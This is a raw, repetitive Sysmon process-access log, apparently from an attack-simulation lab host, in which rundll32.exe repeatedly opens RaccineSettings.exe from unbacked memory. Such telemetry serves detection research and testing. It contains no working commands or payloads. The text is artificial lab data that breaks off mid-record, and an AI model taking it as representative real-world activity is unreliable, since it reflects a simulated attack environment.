Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003598Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003597Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003596Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003595Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003594Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003593Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003592Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003591Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003590Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003589Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003588Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003587Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003586Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003585Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003584Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003583Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003582Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003581Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003580Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003579Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003578Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003577Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003576Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003575Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003574Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003573Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003572Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003571Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003570Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003569Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003568Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003567Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003566Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003565Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003564Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003563Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003562Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003561Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003560Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003559Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003558Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003557Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003556Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003555Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003554Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003553Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003552Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003551Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003550Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003549Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003548Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003547Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003546Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003545Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003544Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003543Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003542Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003541Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003540Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003539Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003538Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003537Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003536Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003535Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 